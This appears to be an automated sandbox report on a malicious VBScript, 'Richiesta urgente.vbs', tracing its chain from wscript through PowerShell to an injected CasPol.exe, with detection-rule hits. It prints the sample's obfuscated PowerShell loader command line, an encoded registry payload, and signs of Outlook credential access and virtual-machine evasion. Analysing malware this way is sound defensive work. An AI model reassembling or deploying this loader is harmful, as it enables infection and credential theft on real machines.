Source: Richiesta urgente.vbs, type: SAMPLE | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4088.amsi.csv, type: OTHER | Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5840, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A8868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A4968
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A7B90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A8868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00A40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00A40040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_009A4958
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_0136BA76
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_1DA00B7D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_1DB3D832
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_1DB37E50
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_20220900
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_20220070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_20222940
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_202208A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209E9CF8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209E6050
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209EBE98
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209EC2D8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209EA6EC
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209E3FF0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_1D95AFDA NtQuerySystemInformation,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_1D95AFB8 NtQuerySystemInformation,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 98%
Source: Richiesta urgente.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA66C.tmp" "c:\Users\user\AppData\Local\Temp\2vgl23kr\CSC2C40FF502EE54A39B5D71CE974C4B10.TMP"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
          Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AAB6 AdjustTokenPrivileges
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1D95AA7F AdjustTokenPrivileges
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qdv1nroa.nix.ps1
          Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@2/2
          Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll (3 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_01
          Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Richiesta urgente.vbs"
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File read: C:\Windows\System32\drivers\etc\hosts (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: Binary string: fk8C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.pdb source: powershell.exe, 00000003.00000002.738843445.0000000004AE7000.00000004.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Antar\Handlings\Detekteringernes", "cQGbcQGbuqdXJKrrAmx26wLrX4HqxXyk4nEBm+sC5jeB8kIefsfrApk4cQGb6wLc7XEBm+tP", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skolegaardene = """ReABedSadDi-FiTGe", "", "", "0")
          Source: Yara match File source: 00000003.00000002.759722470.0000000006CF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000A.00000000.627203109.0000000001350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skolegaardene = """ReABedSadDi-FiTGeySjpSyeAn De-ChTHeyTepAneLaDReeOpfPriNonMiiPrtSainooScnKa Da'KouRisFoiUdnMygSy SySImyInsOftTreTumok;SuuStsNyiSunBigDr TrSMiyAssDatDeePrmTi.DoRMiuManSotCoiGamDueBi.BoIAnnSotPheOprInoUdpTeSDeeOmrgovStiKncTreDesFo;oppSiuPabFolVaiAfcGl ElsShtFiaBatHviCocOt dacUnlRyaDzsSpsOr SiRChePraUdbStrGiiSidAdgPaeNodAt1Ch In{Cr[FjDDrlAdlSqIHemTapKooBerVatDe(Ne`"""SowOwiHanSamBlmBa.DedSalBalIn`"""Bi)Sg]KopPeuAsbFolUniHocMy PrsGrtUnaSetIniStcSi HaeNexSktBrePorFenGe uniUnnArtMa HomCaiMbdSaiSuOTjuLgtNoOZipFoeJrnXs(SmiOrnButbr PokPrvAbaTalMoiBe,TiiganSatth brKAtovinTe,ZaiLunDitAd KoRRuiOvnPegSaeAtdTh,RriBanTrtDe SpUOunPywFooHe,HoiKnnGetHa koUWidGreRe)Co;as[MuDTulAllReIThmNopBloBrrFitNe(Ud`"""SekUneserObnOmeBilHl3Up2Te`"""He)av]RipAruFubOclFiiCucMa AssEmtSaaDrtApiFrcTu RaeStxDitKieVerMenPr JiiFanOvtLo ArLMooPecviaAulprSUnhCarPoihunSvkde(OuiUnnHitSt ResDycPuoUnrTupGriBr,WhiVenDotSt StNSasFikOveMatImnUp)Eu;Fg[GuDHylAnlFuIPemAfpLeoWirMutRa(Kh`"""VekBieEmrAdnPueanlNl3Ek2bl`"""Sp)Pe]RepGeuRebPrlReiRacSt desBetTaaMatFiiFocOm SheFaxPitDieUnrTanko BliSunKatKe ScSAreCatAnCUdoMomBomSiSDitCaazatAmeRe(UniSmnExtSe CoKCuoBefAltSmaAf,NaiAfnLatSu scSLatKaoHorHorTryBu)sk;Kr[LiDstlImlcuIHomEkpTaoRkrBrtSh(Pu`"""PskFeeSkrAnnOpeunlBi3Sp2ut`"""Va)Gr]GopOruPabOvlUpiShcSu VesBetLaaIstPtiSncEn PueBuxAgtCoeunrCanUe AliMonvetCe TrHLeeSaaSlpJaCDyrSieDiaAftTieDr(IliGrnUdtEn ScNDoeDocWirHioSapBe,BiiVonSitDo GaFSelafsFnkPr,IniInnAntOs moGSirSpuFipLe)Al;Sy[brDUplAblSeIPomSupTeoBarbltGl(Af`"""PrkCoeXerBanFleAflsy3Br2Ma`"""un)Tr]HepNauNobColUliRecUd SrsDetThaRotKuiIscPh GreBexFrtGeeSprMinVi CiiFinwotDe StVFaipsrZotThuMiaOplStAArlUnlAgoGrcbo(DaiSanSytAf EqvEp1Sy,hoiDenOxtSt UnvMe2Be,TriKonKotro SkvFl3wi,FoiMonGatFi 
StvMi4Ch)Be;Tu[PaDAtlBglOpIKomPhpLaoBarSptWa(Ma`"""ThiJamRemDe3Ba2Vi.HedSolSalBa`"""Fe)Br]SepLuuEnbAflDeiHocSk LusHytViaantKoiPocZr NoeDrxUrtCleFardonBl HeiBanBrtXe hvIBlmRhmAgSkreDetEvSMatFiaRatUduAnsDuWAniRunKedDioOpwTrPBroAnsPu(CoiUnnDitBa NePPoaSklSkaEn,ChiRenXetAl skRPyaInzNe)Me;Bi[VaDRelRhlAnIsemifpOuochrFrtDe(Ti`"""omAHyDwiVreAfaPGrIPh3Sn2Mi.SpDNiLPlLVu`"""Ep)Un]VepCluSsbGelReiAfcFl drsLgtMiaErtPaiOpcna SheSixCytOpeGerBenSu UniStnTitAk BaISnnTriSotMaiScaGrlPaiejzCoeAnAKactalBe(PoiPunHntRu TeCTioAclBa,AaiSynMetMi LeUPinDeaPr,AfiMenRetAs FaFMelFroTepOrpOl2na0Ma1Sn)Mi;In[DeDSalPalslIChmNopEroPhrEutSc(Pa`"""EngSvdTaiOl3Re2so`"""Ud)Qu]FipHyuSkbAdlMaiGucGi OcsUdtlaaMotReiFrcSk IjeWixAxtqueUnrHanBo GeiCinMatSa HuSSeeRatBeWEdiLinBldEnoMewFuEPexNotBrEStxPl(SliSanNvtGe biDDauDacFl,buiTynCetTo UdHToeLanHubHulDy,AniBenOutTi MoSKuiBrdRaecotCaaFo,IsiTinThtUb AfAUlpFrpIsaTosIs)Pa;Uf[AuDTilCalAfIScmBapOmoIkrHetOm(Un`"""MygPrdAliPa3An2Tr`"""Un)Th]RopjouCebMalFliBlcBl AgsLrtPyaBetHjiCocUl TaeVoxFotAfeNorAlnBy CoiAunIttHa NaUTrnNorIgeGeakelNoiVazAneStOSjbEnjSieOpcFrtUn(LeiHjnUntKi RvHNooBiwBeeFraManhe)Su;Sp[CaDDilUdlPlIBemFrpNooEgrDitDe(Ce`"""couDesAg
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_1DB3D832 pushfd ; ret
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E394B push 8BFFFFFFh; retf
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 10_2_209E3622 push ebp; iretd
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll
          Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (45 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (2 occurrences)
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX (45 occurrences)

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
          Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE*
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Function Chain: memAlloc,threadCreated,memAlloc,memAlloc,threadResumed,threadDelayed,processSet,memAlloc,processSet,memAlloc,memAlloc,memAlloc,threadDelayed,processSet,memAlloc,memAlloc,threadDelayed,memAlloc,threadDelayed,threadDelayed,systemQueried,threadDelayed,threadDelayed,memAlloc,threadDelayed
          Source: Initial file | Initial file: do while timer-temp<sec
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1388 | Thread sleep time: -3689348814741908s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 | Thread sleep count: 235 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 | Thread sleep time: -7050000s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 2944 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2vgl23kr\2vgl23kr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8736
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
          Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 30000
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: ModuleInformation
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
          Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
          Source: powershell.exe, 00000003.00000002.724108628.0000000000C2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe*
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
          Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: CasPol.exe, 0000000A.00000002.823176402.000000000178B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWM~
          Source: powershell.exe, 00000003.00000002.732273306.000000000489F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-VScx
          Source: powershell.exe, 00000003.00000002.739431756.0000000004B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.748157526.0000000004E59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: fk:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
          Source: CasPol.exe, 0000000A.00000002.823804324.00000000017E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW"
          Source: CasPol.exe, 0000000A.00000002.827893647.000000000325A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 10_2_209E9980 LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Memory allocated: page read and write | page guard
